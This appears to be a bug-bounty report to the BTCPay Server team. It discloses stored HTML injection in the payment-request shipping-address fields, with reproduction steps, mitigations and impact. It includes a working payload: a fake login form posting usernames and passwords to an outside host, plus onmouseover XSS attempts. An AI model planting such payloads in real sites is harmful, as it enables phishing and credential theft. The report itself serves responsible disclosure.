Team,

I hope you are all doing well.

*. I wanted to bring to your attention a potential vulnerability on the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.

*. During my research, I discovered that the five plus fields are vulnerable to a stored HTML injection attack inside the >>> Request payment >>> Request Customer Data Checkout >>> Request shipping address in https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests/edit/ec575d56-6b8e-41bd-8b9a-bdcda9c5daad.

Proof of Concept:

*. I have created a video demonstration of the vulnerability and uploaded it to my Google Drive.

*. The link for the video is provided below for your review:

https://drive.google.com/file/d/1Pn33vZ4TeFovvkK50eVBUGAkeVSfCQf-/view?usp=sharing

Reproduction Steps:

*. Go to the website https://mainnet.demo.btcpayserver.org/stores/6YSiuoN6q1yF2ucWZvWojBuVJAJzXxFFUn9cw8iNPPMC/payment-requests

*. Click payment request.

*. Request new payment.

*. Remember to enable the >>> Request customer data on checkout >>> Request shipping address.

*. Create the payment request.

*. Now click view, we/user need to enter the address and other stuff.

*. Use the following HTML payload in the below fields:

buyerName   

buyerAddress1   

buyerAddress2   

buyerCity   

buyerZip    

buyerState  

buyerCountry

Payload:

 <html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.test.com/">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br /> 
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
 <br /></form></div></body></html>
<input><input"/onmouseover="confirm(1);//“onload=onload><input><innerHTML><img src="https://www.petmd.com/sites/default/files/Acute-Dog-Diarrhea-47066074.jpg" width="1000" height="750" alt="onmouseover=prompt(1);//" /></a></input>

*. Save this information.

*. Now, cancel payment and move on to the payment request and click edit data.

*. Check that request shipping address part were stored and rendered the html injection.

*. That's the issue.

*. Tried both Html/javascript injections, but html injection only worked. Due to your content security policy JS omitted.

Solution:

*. Restrict special characters and HTML encode attributes in the input fields.

*. Use regular expressions or other techniques to detect and reject malicious input.

*. Avoid embedding user input into emails unless necessary and always HTML-encode user input before embedding it into emails.

*. Implement proper input validation and sanitization measures to prevent this type of vulnerability from occurring in the future.

Impact

*. Stored HTML injection with credentials capturing can have serious negative impacts on both individuals and organizations.

*. This type of attack involves injecting malicious code into a website's database, which can then be retrieved and displayed to unsuspecting users. If the injected code captures login credentials, it can allow an attacker to gain unauthorized access to sensitive information or even take control of user accounts.

*. The impact of such an attack can be significant, including financial loss, reputational damage, and legal consequences.

*. For individuals, stored HTML injection with credentials capturing can result in identity theft or the compromise of personal and financial information.

*. For organizations, it can lead to the theft of sensitive data, disruption of services, and loss of customer trust.

*. To prevent this type of attack, it is important for website developers to follow secure coding practices and implement security measures such as input validation and encryption.

*. It is also crucial for users to be vigilant and use strong, unique passwords and to never reuse passwords across multiple accounts.